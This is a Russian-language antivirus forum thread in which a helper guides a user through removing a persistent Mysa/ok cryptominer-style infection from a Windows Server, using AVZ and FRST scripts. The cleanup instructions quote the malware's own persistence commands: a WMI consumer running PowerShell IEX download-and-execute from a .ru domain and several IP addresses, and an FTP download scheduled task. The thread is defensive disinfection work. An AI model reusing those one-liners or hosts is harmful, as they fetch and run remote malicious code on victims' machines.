Перейти к содержанию
Правила раздела

Mysa 1, Mysa 2, ok, okaa вирус меняет DNS и закрывать 445, 139 порт

ARDEV_AST

Автор ARDEV_AST,
в Помощь в удалении вирусов

 Share Подписчики 1

Рекомендуемые сообщения

ARDEV_AST

ARDEV_AST 0

Опубликовано
Опубликовано

Добрый день! На Windows Server 2008 появился вирус Mysa 1, Mysa 2, Ok, Okaa. Запускается через планировщик задач. Меняет первичный DNS на сетке и скачивает файл по FTP. Блокирует 445 и 139 порты через Брендмауэр. При удалении вирус появляется снова через 3 часа примерно либо сразу после перезагрузки сервера. Переустановка ОС на 2012 не помогло. Cureit и KVRT сканирует находит вирусы и лечит, однако вирус снова появляется через 3 часа. Другие антивирусы не устанавливаются. Браузер тоже не дает запустить. 

Ссылка на сообщение
Поделиться на другие сайты
ARDEV_AST

ARDEV_AST 0

Опубликовано
  • Автор
Опубликовано
3 часа назад, ARDEV_AST сказал:

Добрый день! На Windows Server 2008 появился вирус Mysa 1, Mysa 2, Ok, Okaa. Запускается через планировщик задач. Меняет первичный DNS на сетке и скачивает файл по FTP. Блокирует 445 и 139 порты через Брендмауэр. При удалении вирус появляется снова через 3 часа примерно либо сразу после перезагрузки сервера. Переустановка ОС на 2012 не помогло. Cureit и KVRT сканирует находит вирусы и лечит, однако вирус снова появляется через 3 часа. Другие антивирусы не устанавливаются. Браузер тоже не дает запустить. 

 

CollectionLog-2022.10.28-12.20.zip

Ссылка на сообщение
Поделиться на другие сайты
Sandor

Sandor 1 252

Опубликовано
Опубликовано (изменено)

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО. Отключите на время лечения сервер от локальной сети.

Выполните скрипт в AVZ (Файл - Выполнить скрипт): 

begin
 TerminateProcessByName('C:\Windows\Inf\aspnet\lsma22.exe');
 TerminateProcessByName('c:\windows\system\msinfo.exe');
 TerminateProcessByName('c:\windows\temp\conhoy.exe');
 QuarantineFile('c:\windows\debug\item.dat', '');
 QuarantineFile('c:\windows\debug\ok.dat', '');
 QuarantineFile('C:\Windows\Inf\aspnet\lsma22.exe', '');
 QuarantineFile('c:\windows\system\msinfo.exe', '');
 QuarantineFile('C:\Windows\system32\csrs.exe', '');
 QuarantineFile('C:\Windows\syswow64\csrs.exe', '');
 QuarantineFile('c:\windows\temp\conhoy.exe', '');
 DeleteSchedulerTask('MicrosoftsWindowsy');
 DeleteSchedulerTask('Mysa1');
 DeleteSchedulerTask('Mysa2');
 DeleteSchedulerTask('ok');
 DeleteSchedulerTask('oka');
 DeleteFile('c:\windows\debug\item.dat', '');
 DeleteFile('c:\windows\debug\item.dat', '64');
 DeleteFile('c:\windows\debug\ok.dat', '64');
 DeleteFile('C:\Windows\Inf\aspnet\lsma22.exe', '32');
 DeleteFile('c:\windows\inf\aspnet\lsma22.exe', '64');
 DeleteFile('c:\windows\system\msinfo.exe', '32');
 DeleteFile('C:\Windows\system32\csrs.exe', '');
 DeleteFile('C:\Windows\syswow64\csrs.exe', '');
 DeleteFile('c:\windows\temp\conhoy.exe', '');
 DeleteFile('c:\windows\temp\conhoy.exe', '64');
 CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
 ExecuteRepair(9);
end.

 

Пожалуйста, перезагрузите компьютер вручную.

 

Закройте общие ресурсы:
 

Цитата

 

G:\DN

C:\Users

C:\Y

 

 

 

 

"Пофиксите" в HijackThis только это: 

O25 - WMI Event: killmm4 - killmm3 - Event="__InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'",  cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.0810bye.ru:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://192.236.160.237:8237/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://144.208.127.215:8215/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.161:8161/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://155.94.235.39:8039/power.txt')"

 

 

 

Для повторной диагностики запустите снова AutoLogger. Прикрепите новый CollectionLog.

 

Остальные компьютеры в локальной сети тоже следует пролечить, например, с помощью KVRT.

Изменено пользователем Sandor
Ссылка на сообщение
Поделиться на другие сайты
Sandor

Sandor 1 252

Опубликовано
Опубликовано

Это потому, что вы не читаете инструкции. Запускать нужно эту версию AVZ:

Цитата

G:\DN\PROJECT\AutoLogger\AutoLogger\AV\av_z.exe

 

Ссылка на сообщение
Поделиться на другие сайты
Sandor

Sandor 1 252

Опубликовано
Опубликовано

Дополнительно:

 

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.
Когда программа запустится, нажмите Да для соглашения с предупреждением.

Нажмите кнопку Сканировать (Scan).
После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.
 

Ссылка на сообщение
Поделиться на другие сайты
Sandor

Sandor 1 252

Опубликовано
Опубликовано
6 минут назад, ARDEV_AST сказал:

Нужно закрыть общий доступ?

Да, обязательно, по крайней мере на время лечения.

А также, повторю, обязательно пролечите остальные компьютеры в локальной сети.

 

 

  • Отключите до перезагрузки антивирус.
  • Выделите следующий код: 
    Start::
CloseProcesses:
(services.exe ->) (Microl office) [Файл не подписан] C:\Windows\System\msinfo.exe
(svchost.exe ->) (www.google.com) [Файл не подписан] C:\Windows\Inf\aspnet\lsma22.exe
(winlogon.exe ->) () [Файл не подписан] C:\Windows\Temp\conhoy.exe <2>
IFEO\uihost32.exe: [Debugger] ntsd -d
IFEO\uihost64.exe: [Debugger] ntsd -d
IFEO\vid001.exe: [Debugger] ntsd -d
Policies: C:\ProgramData\NTUSER.pol: Ограничение <==== ВНИМАНИЕ
Task: {0E294A8E-7728-43A7-90BF-02C6C7F4518B} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa <==== ВНИМАНИЕ
Task: {2A359626-624C-4AE5-9047-8578174BA8FF} - System32\Tasks\MicrosoftsWindowsy => c:\windows\temp\conhoy.exe [7680 2022-10-28] () [Файл не подписан] <==== ВНИМАНИЕ
Task: {B014DEA5-1368-4AD4-BA65-F4AE0E48812E} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ВНИМАНИЕ
Task: {E797E12A-39D5-4BB2-BC69-ED6EFDEBD750} - System32\Tasks\oka => c:\windows\inf\aspnet\lsma22.exe [1709568 2022-10-28] (www.google.com) [Файл не подписан]
Task: {F52ACB45-234B-451C-816C-6027C02CA9D4} - System32\Tasks\Mysa2 => cmd /c echo open ftp.ftp0810.ru>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ВНИМАНИЕ
R2 xWinWpdSrv; c:\windows\system\msinfo.exe [7277056 2022-10-28] (Microl office) [Файл не подписан]
2022-10-28 13:37 - 2022-10-28 13:37 - 000003450 _____ C:\Windows\system32\Tasks\Mysa1
2022-10-28 13:37 - 2022-10-28 13:37 - 000003446 _____ C:\Windows\system32\Tasks\ok
2022-10-28 13:37 - 2022-10-28 13:37 - 000003422 _____ C:\Windows\system32\Tasks\Mysa2
2022-10-28 13:37 - 2022-10-28 13:37 - 000003344 _____ C:\Windows\system32\Tasks\oka
2022-10-28 13:37 - 2022-10-28 13:37 - 000003332 _____ C:\Windows\system32\Tasks\MicrosoftsWindowsy
2022-10-28 00:09 - 2022-10-28 00:09 - 006466100 _____ (Microsoft Corporation) C:\Windows\SysWOW64\csrs.exe
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"killmm4\"",Filter="__EventFilter.Name=\"killmm3\"::
WMI:subscription\__EventFilter->killmm3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System']
WMI:subscription\CommandLineEventConsumer->killmm4::[CommandLineTemplate => cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.0810bye.ru:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http:/ (запись имеет ещё 362 символов).]
2022-10-28 13:37 - 2022-10-28 13:37 - 004122624 _____ () [Файл не подписан] c:\windows\debug\item.dat
FirewallRules: [{E73C64F9-DA37-4D1A-8665-E8649016BFAC}] => (Block) LPort=445
FirewallRules: [{8709D4A8-BBF2-48E8-B13E-8D8CE5D3239E}] => (Block) LPort=139
End::

     

  • Скопируйте выделенный текст (правой кнопкой - Копировать).
  • Запустите FRST (FRST64) от имени администратора.
  • Нажмите Исправить (Fix) один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.


Компьютер перезагрузите вручную.

Подробнее читайте в этом руководстве.

Ссылка на сообщение
Поделиться на другие сайты
ARDEV_AST

ARDEV_AST 0

Опубликовано
  • Автор
Опубликовано

Обеденный перерыв у сотрудников закончился. Продолжу вечером. Спасибо за помощь. Вечером обязательно дам обратную связь.

Ссылка на сообщение
Поделиться на другие сайты

Присоединяйтесь к обсуждению

Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.

Гость
Ответить в этой теме...

×   Вставлено с форматированием.   Вставить как обычный текст

  Разрешено использовать не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отображать как обычную ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставлять изображения напрямую. Загружайте или вставляйте изображения по ссылке.

×
 Share
Подписчики 1
Перейти к списку тем
×
×
  • Создать...